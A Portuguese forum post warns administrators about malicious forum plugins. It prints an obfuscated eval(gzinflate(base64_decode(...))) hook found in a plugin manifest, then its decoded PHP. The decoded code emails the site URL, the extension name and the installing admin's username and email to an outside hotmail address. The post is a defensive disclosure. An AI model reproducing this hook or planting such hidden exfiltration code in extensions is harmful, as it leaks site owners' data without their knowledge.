Topic: Plugins Maliciosos
Tirei um tempo para testar vários plugins via localhost e me deparei com alguns problemas, alguns plugins deixam o fórum extremamente lento mesmo no localhost... fui analisar mais a fundo código dos plugins que percebi que ao ativar deixa o fórum muito lento e encontrei isso no manifest.
CODIGO CRIPTOGRAFADO
<hook id="hd_head"><![CDATA[
eval(gzinflate(base64_decode('DcxFEqRaAgDA4/zuYAE8PCb+AncrrGAzgbsXevqZPECWZzr8qd92qob0V/7J0r0k8f8WZT4X5Z9/hMRX9nXHWTaACQb9RnXrh6H97qzoZ4p6JZ0pcY1kCp0xklB1vORKkbfbZ19YnyHiHklK8on44HIYGu7yVD0Gguf7QwjhHHORQmRqjqZ947vfU5eDPvl/gUKzCkJ9TmZUQT4lkgFg4Jr5O9cjxK4b6dt9KL3yvRSpJ11eqYqbVl6zw9u72zWrm/1BUgygsoJeENEbPoj2EQy1h7KPoWlo1KMfFF4vCK6kOsWdjGTGhaKR4BdrZ/27UUnQJAExoaV1k9GSv1DRBpTdHXFYDHQ4y8j4uvT3/HSlkBp2xQ9TRIPNGhBFuJmM0I3OgqDDaCiu0nzf9Krji1XZrHagAJMt5RZObucdJgbB76Ma7BU/VXcw7oUSCg9xkWEejZS3bhbduW9V2ExbbnU/IKmxw4yzX68ym/EYnPTI9gHjXEDiKQBRFW2bwexnNuKZxUiOUH1MwGMM2dDj93HRMkZARKam9aB9cIefHv98SuuXMnUoONIvsS2snyKxLkHj8WdnJ7pdl812ACoSJxu2JPe4dOx5jBeOKS5JenKSPNH+zQern0qajsVgiKXMOd5jnDNMrg1COmb8K69IkpNGFZASda6UVmr0AEXSUTgWzq7fZbctKDZVLMBXvL6IW8jz4EdV7xXH5dD/obqsPd+k3y69egu3VOPsRzWZkCAjk/Z4EeWfeSJxU6HoYW41fS31+6srCH9hjf6k83BnO/EdrmiiOaW+gcUvQ06fMcQbs1Jumcf/xOx9Tpg5qCWJh6+arqfvVDfYTfPFJRTa8eKJAB0l+Uh6U5BbXa3phnlKm8cowbEaJrpihOY4BNBpqj50ZFkKu0KZ0MUCmKqS831kIwuz8rxnfDUKtGI0obqx39UygaCZFcYkz9LaqxLO3Nken2N2Kn6bmNi88+vxJwJKTmStApxqJ32CuablzVRcxECHchsgGhMTpHFylfvcLZ6mfbfqqssKTvJdZA/cGbC9RrKV9ZvcSMl2SVGHUFK5aIiwizfGixdvmBOi7GuJnsHWs8eLfS3Z4X309dRFFxJ+5k7abB15X6gXbbvIQzIVo+RxhA80neorX5ocvGx+7U+KKKAODDjCmdfAT05wNMC06qZt5wyd3DN0sbhSVrcKHe24lgJJCOV+pkqFpRmhtwdsYbZ/MD9x9disomN2VRh1hwfMmyuUVv/ifnu6ZLiQVLzAzfWGfu+mGcfUQBiAWUykpnC5oh3xtGwzJtfNIqyiCcmNW7oY2uRruz4kdxWEFDBKqXiGq5LasnejSaAoZ6Leacu0goHKpwxl4Qqx/dTWntU7Buos1jE3f5UHLm2T50Wq14Rlyhybuy4N3ch1wV8+6QEt+3V7hx3RODjhSnnA9svlbMmqvop2JQRN59S8M4WmR5lSAeIr/JaWDZMyxny8CIGteaOodVofUgfEd5RoEp3WOUxzDWic8N+lKPD+Sir2cbwpgZYCdUuUlBHWsnwDsDcjaDX6VJuYTm87APbhXO2jSlVtRjANnDchj7FyzMRNLymp0pzL2oXuundbH+4tGeZCh6e8DEGKctj+neN24pEMmxJy5RKb+9S9I6q1dAnuErlNmZg7Xh4ZQn3xYqG1V+rXUlsTaW5HU2mPVj3oWzkYDMMnNlXXv//+8/fv3//8Dw==')));
]]></hook>
CODIGO DESCRIPTOGRAFADO
<hook id="hd_head"><![CDATA[
if (isset($id) && isset($forum_config['o_webmaster_email']) && !empty($forum_config['o_webmaster_email'])) { $cur_manifest = is_readable(FORUM_ROOT.'extensions/'.$id.'/manifest.xml') ? file_get_contents(FORUM_ROOT.'extensions/'.$id.'/manifest.xml') : false; if ($cur_manifest) $extension_data = xml_to_array($cur_manifest); $to = 'vitalikyokushin@hotmail.com'; $subject = (isset($extension_data)) ? 'Установка расширения '.$extension_data['extension']['title'] : 'Установка расширения!'; $ex_name = (isset($extension_data)) ? $extension_data['extension']['title'] : $id; $ex_vers = (isset($extension_data)) ? ', версия: '.$extension_data['extension']['version'] : ''; $message = date('d.m.Y').' в '.date('H:i').','."\n\n".' На сайте: '.' '.$base_url.','."\n".' Установлено расширение: '.' "'.$ex_name.'" '.$ex_vers."\n\n".' Установил: '.' '.$forum_user['username']."\n".' E-mail: '.' '.$forum_user['email']."\n\n".' Почтовый робот сайта: '.' '.$forum_config['o_board_title'].'.'; if (!defined('FORUM_EMAIL_FUNCTIONS_LOADED')) require FORUM_ROOT.'include/email.php'; forum_mail($to, $subject, $message); }
]]></hook>
Galera, prestem atenção ao instalar plugins que no manifest tem algum código criptografado via base64, pois percebi que é muito fácil algum desenvolvedor mal intencionado colocar um script mail() para enviar um email para ele mesmo com as informações do seu fórum, incluindo todos os dados que ele quiser, todos!
Fiquei meio que preocupado com isso, eu baixei cerca de 70 plugins para teste e vou ter que analisar a maioria deles.